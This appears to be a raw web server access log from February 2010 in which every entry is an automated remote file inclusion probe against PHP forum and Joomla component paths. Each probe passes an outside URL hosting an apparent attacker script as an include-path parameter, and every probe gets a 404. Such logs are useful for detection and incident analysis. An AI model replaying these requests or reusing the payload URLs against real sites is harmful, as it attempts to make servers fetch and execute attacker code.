218.38.136.126 - - [08/Feb/2010:09:46:43 -0800] "GET /logs/access_100120.log%20%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:46:43 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.190.243.10 - - [08/Feb/2010:09:47:01 -0800] "GET /logs/access_100110.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:47:12 -0800] "GET /logs/access_100107.log%20%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:47:33 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:47:59 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:47:59 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:47:59 -0800] "GET /logs/access_100127.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:48:00 -0800] "GET /logs/access_100107.log%20%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:48:00 -0800] "GET /logs/access_100120.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:48:00 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:48:00 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:48:19 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:48:19 -0800] "GET /logs/access_100127.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:48:19 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:09:48:20 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:09:48:20 -0800] "GET /logs/access_100117.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:09:48:21 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:48:37 -0800] "GET /logs/access_100107.log//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:49:01 -0800] "GET /logs/access_100130.log%20%20///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:49:08 -0800] "GET /logs/access.log%20%20///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:49:40 -0800] "GET /logs/access_100127.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:49:40 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:49:40 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:50:10 -0800] "GET /logs/access_100110.log%20%20//accounts/inc/errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [08/Feb/2010:09:50:56 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [08/Feb/2010:09:50:56 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.202.238.67 - - [08/Feb/2010:09:50:56 -0800] "GET /logs/access_100203.log//bbs/write_update.php?board_skin_path=http://www.labottevini.com/site/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:51:12 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:51:20 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:51:52 -0800] "GET /logs/access_100107.log%20%20//accounts/inc/errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:09:53:26 -0800] "GET /logs/access_100121.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:09:54:25 -0800] "GET /logs/access_100107.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:54:29 -0800] "GET ///skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:54:29 -0800] "GET /logs////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:54:29 -0800] "GET /logs/access_100109.log%20%20////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:54:41 -0800] "GET ///skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:54:41 -0800] "GET /logs////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:54:41 -0800] "GET /logs/access_100109.log////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:54:51 -0800] "GET /logs/access_100201.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:55:03 -0800] "GET ///skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:55:03 -0800] "GET /logs////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:55:03 -0800] "GET /logs/access_100109.log////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:55:05 -0800] "GET ///skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:55:05 -0800] "GET /logs////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:55:05 -0800] "GET /logs/access_100109.log////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.37.206 - - [08/Feb/2010:09:55:09 -0800] "GET /errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [08/Feb/2010:09:55:09 -0800] "GET /logs//errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:55:13 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:55:13 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:55:13 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:55:29 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [08/Feb/2010:09:55:32 -0800] "GET /logs/access_100114.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.bok4u.com/board/icon/private_icon/templates/sken/id1(feelcomz).txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:55:36 -0800] "GET /logs/access_100108.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:55:38 -0800] "GET /logs/access_100109.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:55:38 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:55:38 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:55:39 -0800] "GET /logs/access_100113.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:55:58 -0800] "GET /logs/access_100113.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:56:10 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:56:10 -0800] "GET /logs/access_100114.log////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:56:34 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:56:35 -0800] "GET /logs/access_100110.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:57:13 -0800] "GET ///skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:57:13 -0800] "GET /logs////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:57:13 -0800] "GET /logs/access_100114.log%20%20////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:57:13 -0800] "GET /logs/access_100109.log%20%20////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:57:23 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [08/Feb/2010:09:57:37 -0800] "GET /logs/access_100127.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.budeko.pl/language/one.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:58:06 -0800] "GET /logs/access_100114.log%20%20////skin/buzzard_espoon/setup.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:58:49 -0800] "GET //bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:58:49 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:59:27 -0800] "GET /logs/access_100130.log%20%20///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:59:35 -0800] "GET /logs/access.log%20%20///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:59:45 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:59:45 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:59:45 -0800] "GET /logs/access_100112.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.37.206 - - [08/Feb/2010:10:00:16 -0800] "GET /errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [08/Feb/2010:10:00:16 -0800] "GET /logs//errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.171.37.206 - - [08/Feb/2010:10:00:16 -0800] "GET /logs/access_100121.log%20//errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:10:00:19 -0800] "GET /logs/access_100109.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
186.28.232.13 - - [08/Feb/2010:10:02:43 -0800] "GET /logs//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [08/Feb/2010:10:02:43 -0800] "GET /logs/access_100121.log%20//errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
186.28.232.13 - - [08/Feb/2010:10:02:43 -0800] "GET /errors.php?error=http://www.openbee.org/media/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
213.171.37.206 - - [08/Feb/2010:10:03:31 -0800] "GET /logs/access_100121.log//errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:04:50 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:04:50 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:04:50 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:04:51 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:04:51 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:04:51 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:05:07 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:05:10 -0800] "GET /logs/access_100116.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:05:35 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:05:35 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:05:40 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:05:40 -0800] "GET /logs/access_100125.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:10:05:40 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:06:40 -0800] "GET /logs/access_100112.log%20%20//inc/pipe.php?HCL_path=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:06:40 -0800] "GET /logs//inc/pipe.php?HCL_path=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:06:40 -0800] "GET /inc/pipe.php?HCL_path=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:06:51 -0800] "GET /logs//inc/pipe.php?HCL_path=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:06:51 -0800] "GET /inc/pipe.php?HCL_path=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:06:51 -0800] "GET /logs/access_100112.log%20%20//inc/pipe.php?HCL_path=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:06:58 -0800] "GET /logs/access_100112.log//inc/pipe.php?HCL_path=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:07:05 -0800] "GET /logs//admin.php?include_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:07:05 -0800] "GET /logs/access_100117.log%20%20//admin.php?include_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:10:07:06 -0800] "GET /admin.php?include_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.230.82 - - [08/Feb/2010:10:07:11 -0800] "GET /logs/access_100112.log//inc/pipe.php?HCL_path=http://www.onroadzone.com/nacount/pid?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:10:09:19 -0800] "GET /logs/access_100114.log//////////?_SERVER%5BDOCUMENT_ROOT%5D=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
